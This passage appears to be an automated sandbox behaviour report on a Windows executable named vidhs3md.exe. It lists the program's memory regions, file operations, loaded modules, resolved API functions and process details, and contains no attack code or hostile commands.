| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00630000 | 0x00659fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x01ceffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74550000 | 0x745e1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74730000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x74730000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x74731580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x74731500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x74731560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:35 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #150: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #150 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula "Journal.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:57, Reason: Child Process |
| Unmonitor | End Time: 00:05:00, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcbc |
| Parent PID | 0xc44 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CC0
0x
CDC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00200000 | 0x002bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74550000 | 0x745e1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74730000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
